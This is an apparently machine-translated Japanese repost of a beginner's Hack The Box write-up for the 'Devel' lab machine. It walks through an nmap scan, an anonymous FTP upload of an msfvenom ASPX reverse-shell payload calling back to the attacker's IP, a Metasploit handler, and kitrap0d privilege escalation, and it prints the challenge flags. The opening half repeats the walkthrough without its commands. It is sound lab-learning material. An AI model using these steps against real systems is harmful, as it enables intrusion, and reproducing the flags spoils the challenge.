ハックボックスをデベルのための書き込み
6451 ワード
最近、倫理的なハッキングをしてきました.これは私が最初に書いたのは、私が侵入したコンピュータ(合法的なもの)の一つです私が妥協した機械はDevelにHackthebox.euと呼ばれている.倫理的なハッキングに関しては初心者です.
全体的にこのボックスは楽しかったです.それは私が本当に強力であるmetasploitを使用してより多くの経験を得ることができました.私は完全にこのツールを使用してスクリプトキッドです.
nmapスキャンを始めましょう.

我々がIISバージョン7をデフォルトページで持っているように見えます.anonymousでFTPサーバにログインできますか?

匿名ログインはうまくいった.IISのスタートページのようなファイルがいくつかあります.これはウェブディレクトリでしょうか?
そのディレクトリにファイルをアップロードできますか



はい!さて、今では、msfvenomを使って、逆シェルを得るために利用できるページを作成しましょう.私は詳細を見つけるためにこれをgoogled.

最初のリンクは、私に私が必要としたものを与えました.lhostをマシンのIPアドレスに置き換えてください.

現在、我々はスクリプトをウェブサイトにFTPでアップロードするようにしました.これは逆のシェルを与えるべきです.最初に、私たちが逆シェルを捕えることができるように、Metasploitを起動させましょう.

次のようにします.

それはあなたに箱のシェルを得るべきです.
getuidを実行すると、IIS APPool\Webユーザーが表示されます.もっと仕事があるようにルートが欲しい.
シェルに行ってSystemInfoを使っていくつかのexploitを見つけることができます.

ここで、シェルを終了し、meterpreterセッションをバックグラウンドで終了し、いくつかのexploit研究を行います.

あなたが正しくそうしたならば、あなたは我々が使うことができるExpoitsのリストを見なければなりません.私は、これらのうちのどれが最もよいかについて見るために、Googleになければなりませんでした.推薦は、kitrapd 0 d、リストの第2を使うことでした.

私は最初にgoofedとセッションを残した.私はそれを追加し、悪用が働いた.

あなたが正しくすべてをしたならば、あなたはmeterpreterプロンプトで戻るべきです.あなたが動くならば、あなたは見なければなりません:

すごい、我々はこの箱を所有します.ユーザーをつかむ.txtとroot.txt.私は最初にどのWindowsコマンドを使うのかを覚えている.私は結局それを考え出した.


ユーザフラグは:
この箱はとても楽しかった.私は私のような初心者にそれをお勧めします.
全体的にこのボックスは楽しかったです.それは私が本当に強力であるmetasploitを使用してより多くの経験を得ることができました.私は完全にこのツールを使用してスクリプトキッドです.
nmapスキャン
nmapスキャンを始めましょう.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 11:26 CDT
Nmap scan report for devel.htb (10.10.10.5)
Host is up (0.074s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.29 seconds
スキャンは、我々は、Windowsサーバー上で実行されているFTPサーバーとWebサーバーを持っていることを示しています.ウェブサイトが示すものを見ましょう:
我々がIISバージョン7をデフォルトページで持っているように見えます.anonymousでFTPサーバにログインできますか?

匿名ログインはうまくいった.IISのスタートページのようなファイルがいくつかあります.これはウェブディレクトリでしょうか?
そのディレクトリにファイルをアップロードできますか



はい!さて、今では、msfvenomを使って、逆シェルを得るために利用できるページを作成しましょう.私は詳細を見つけるためにこれをgoogled.

最初のリンクは、私に私が必要としたものを与えました.lhostをマシンのIPアドレスに置き換えてください.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.26 LPORT=1234 -f aspx -o shell.aspx

現在、我々はスクリプトをウェブサイトにFTPでアップロードするようにしました.これは逆のシェルを与えるべきです.最初に、私たちが逆シェルを捕えることができるように、Metasploitを起動させましょう.

次のようにします.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.26
set LPORT 1234
exploit
lhostをVPN上のマシンを指すように変更してください.
それはあなたに箱のシェルを得るべきです.
getuidを実行すると、IIS APPool\Webユーザーが表示されます.もっと仕事があるようにルートが欲しい.
シェルに行ってSystemInfoを使っていくつかのexploitを見つけることができます.

ここで、シェルを終了し、meterpreterセッションをバックグラウンドで終了し、いくつかのexploit研究を行います.
exit
background
use post/multi/recon/local_exploit_suggester
set session 1
run

あなたが正しくそうしたならば、あなたは我々が使うことができるExpoitsのリストを見なければなりません.私は、これらのうちのどれが最もよいかについて見るために、Googleになければなりませんでした.推薦は、kitrapd 0 d、リストの第2を使うことでした.
use exploit/windows/local/ms10_015_kitrap0d
show options
このセッションを実行するモジュールにローカルホストホストとローカルホストポートを走らせる必要があります.set sessions 1
set LHOST 10.10.14.26
set LPORT 1234
run

私は最初にgoofedとセッションを残した.私はそれを追加し、悪用が働いた.

あなたが正しくすべてをしたならば、あなたはmeterpreterプロンプトで戻るべきです.あなたが動くならば、あなたは見なければなりません:

すごい、我々はこの箱を所有します.ユーザーをつかむ.txtとroot.txt.私は最初にどのWindowsコマンドを使うのかを覚えている.私は結局それを考え出した.


ユーザフラグは:
9ecdd6a3aedf24b41562fea70f4cb3e8
rootフラグは:e621a0b5041708797c4fc4728bc72b4b
この箱はかなり簡単だった.Metasploitそれはかなり簡単にexploitsを見つけることができます.どのモジュールとオプションが最も難しい部分であるかを考え出すこと.Googleはあなたの友人です.また、追加のヘルプのために使用することができますこのボックスに多くのチュートリアルがあります.この箱はとても楽しかった.私は私のような初心者にそれをお勧めします.
Reference
この問題について(ハックボックスをデベルのための書き込み), 我々は、より多くの情報をここで見つけました https://dev.to/joshkerr/hack-the-box-write-up-for-devel-4dm2テキストは自由に共有またはコピーできます。ただし、このドキュメントのURLは参考URLとして残しておいてください。
Collection and Share based on the CC Protocol